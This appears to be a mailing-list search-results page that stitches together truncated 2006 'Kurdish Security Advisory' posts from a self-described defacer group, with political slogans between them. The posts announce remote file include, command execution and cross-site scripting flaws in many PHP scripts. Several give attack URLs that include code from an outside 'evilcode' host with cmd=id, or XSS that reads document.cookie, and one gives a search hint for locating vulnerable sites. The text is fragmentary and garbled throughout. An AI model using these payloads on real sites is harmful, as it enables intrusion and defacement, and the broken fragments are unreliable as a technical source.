-
* Kurdish Security Advisory
* Author : Botan
* Script : Artmedic Links
* Site : http://www.artmedic.de
* Version : 5.0
* Risk : High
* Class : Remote
* Contact : [EMAIL PROTECTED] and irc.gigachat.net
* Kurdish Security Advisory
* Original Advisory :
http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagenda-remote.html
* Script : GrapAgenda
* Site : http://www.graphiks.net
* Version : 0.1
* Risk : High
* Class : Remote
* Contact : [EMAIL PROTECTED] and irc.gigachat.net
* Kurdish Security Advisory
* Original Adv :
http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html
* Script : AnnonceV
* Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html
* Version : 1.1
* Risk : High
* Class : Remote
* Contact : [EMAIL
* Kurdish Security Advisory
* Spaw Editor Remote Include Vulnerability
* Our Party is PKK, Our Army HPG, We will Earn
* contact ? : irc.gigachat.net #kurdhack [EMAIL PROTECTED]
* Risk : High
* Class : Remote
* Script : Spaw Editor
* Version : v1.6 and v1.7
* Site : www.solmetra.com
?
Kurdish Security
newsReporter v1.0 Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Rish : High
Class : Remote
Script : newsReporter
Site : http://www.knusperleicht.at
Code :
require
Kurdish Security
Guestbook v3.5 Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Rish : High
Class : Remote
Script : MoSpray
Site : http://www.knusperleicht.at
Code :
define('FILE_POSTS',GB_PATH.db/posts.dat);
Kurdish Security
FAQ Script v1.0 Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Rish : High
Class : Remote
Script : FAQ Script
Site : http://www.knusperleicht.at
Code :
//if the script is includet you have
Kurdish Security
FileManager Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Rish : High
Class : Remote
Script : FileManager
Site : http://www.knusperleicht.at
Code :
$dwl_download_path = downloads;
Kurdish Security
Quickie Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Rish : High
Class : Remote
Script : Kurdish Security
FileManager Remote Command Execution
Freedom For Ocalan
Contact :
Kurdish Security
ShoutBox Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Rish : High
Class : Remote
Script : ShoutBox
Site : http://www.knusperleicht.at
Code :
Kurdish Security
MoSpray Remote File Include Vulnerability
Original Advisory :
http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
Rish : High
Class : Remote
Kurdish Security Advisory
irc.gigachat.net #kurdhack
Viva Kurdistan!
SiteBar Script Cross-Site Scripting Attack
Site : http://brablc.com/
Version : All Version
Proof of Concept :
http://www.site.com/sitebar/command.php?command=[CODES]
Original Advisory :
#
# Kurdish Security Advisory
# MF Piadas 1.0 Remote File Include Vulnerability
# Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz .
Abdullah Ocalan
# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !
#
# Kurdish Security Advisory
# irc.gigachat.net #kurdhack
# Discovered by Botan
# http://scripts.codingclick.com/MyMail/
http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-9-mymail-directory.html
CodingClick.com MyMail Script is useing for scripts.The passing can do between
# Kurdish Security Advisory
# irc.gigachat.net #kurdhack
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz
$url_path_editor = $root_url/library/editor/;
$abs_path_editor = $root/library/editor/;
?
Proof Of Concept
http://evuln.com/vulns/3/exploit.html look :]
--
___
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze
# Kurdish Security Advisory
# Original Advisory :
http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
# Foing Remote File Include Vulnerability [PHPBB] :}
# Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz .
Abdullah Ocalan
# STOP THE
# Kurdish Security Advisory
# phpRaid Remote File Include [PHPBB] :}
# Sosyalizim'de #305;srar insan olmakta #305;srard#305;r Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL
PROTECTED]
# Script : phpRaid
# Script Website : http://www.spiffyjr.com/
# Kurdish Security Advisory
# phpRaid Remote File Include [SMF] :}
# Sosyalizim'de #305;srar insan olmakta #305;srard#305;r Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL
PROTECTED]
# Risk : High
# Class : Remote
# Script : phpRaid
# Script
Original Advisory :
http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html
#ColMenus Event Remote File Include Vulnerability#
#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]
#Script : CoolMenus v4.0 Event Script
#Risk : High
#Class :
Original Advisory :
http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-include.html
#Artmedic Event Remote File Include Vulnerability
#Website : http://www.artmedic.de/
#Script : Artmedic Event Script
#Risk : High
#Class : Remote
#Greetz : B3g0k,Nistiman,Flot,Netqurd
Website : www.wingnut.net.ms
Author : Botan
Credits : B3g0k,Nistiman,flot,Netqurd
Original Advisory :
http://advisory.patriotichackers.com/index.php?itemid=5
Description : EasyGallery is a simple web-photogallery with a maximum of
user-friendlyness. All you have to do is to upload your photos
Website : www.phplister.org
Version : 0.4.1
Credits : B3g0k,Nistiman,Flot,Netqurd and other
my friends
Original Advisory :
http://advisory.patriotichackers.com/index.php?itemid=3
XSS :
http://www.site.com/[path]/index.php?page=XSS
Website : http://www.calendarix.com
Vulnerable :
if (!isset($_GET['ycyear']))
$ycyear = $y ;
else
$ycyear = $_GET['ycyear'];
http://www.site.com/[path]/yearcal.php?ycyear=scriptalert(document.cookie)/script
Website : http://mywebland.com/
Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = MyEvent 1.2 or /calendar/myevent.php
I. Remote Code Execution
This is script to very big high it bug being found.
Description :
phpFaber TopSites is a feature-packed, reliable and secure Top List coded in
PHP and mySQL. phpFaber TopSites has proven its reliability time and time again
under the most active server environments. Our feature list is large, including
all elements you need to easily maintain
Description :
/* =
File created by Andries Bruinsma
(c) FleXiBle Development (FXB)
Web: http://www.ahbruinsma.nl
Email: [EMAIL PROTECTED]
===
File: main.php
Version: 3.0
Date started: 10th
Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c
Description :
Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not
that Warcraft III replay files (*.w3g) have much information inside. Almost
everything can be pulled out of them: players accounts, races,
Cross Site Scripting Attack CanfTool v1.1
=
Description :
Conftool is a Web-based online system that was developed to supports many
administrative tasks of conferences, workshops and seminars. It can help to
make the management of events easier and
Website : http://www.christian-heffner.de
Version : 1.07
I.
?php
$filename=index.php;
require_once 'vlib/vlibTemplate.php';
$tmpl = new vlibTemplate('tmpl/std/index.tpl');
require_once 'config/db_config.php';
require_once 'config/pcfunctions.php';
Webpage : www.coreslawn.de
Risk : high
Code :
http://www.example.com/index.php?page=evilcode?cmd=id
For Patriotic Hackers
Freedom For Ocalan
irc.gigachat.net #kurdhack
Offical webpage :
http://superbounou.phpnet.org/smartblog/
Version : v1.2
http://www.site.com/[path]/index.php?evilcode?cmd=id
http://www.site.com/?pg=evilcode?cmd=id
Patriotic Hackers
irc.gigachat.net #kurdhack
Botan,B3g0k,Seyh,Nistiman
the risk at bug. Malicios person to reach far away.
Vulnerable :
http://www.site.com/[path]/index.php?page=http://evilcode?cmd=
Patriotic Hackers
http://www.patriotichack.org
We Are Politic Kurdish Defacers!
Botan,b3g0k,Azad,Nistiman,Seyh
Special Thanks : All Kurdish Defacers
Web Site : http://www.tasarimrehberi.com [Turkish Desing]
Description : index.php remote attack
Vulnerable ; http://www.site.com/index.php?sayfaadi=; and index.php?sayfa=
Patriotic Hackers!
Botan,B3g0k,Azad,Nistiman,Fesih :}
Freedom For Ocalan
34 matches
Mail list logo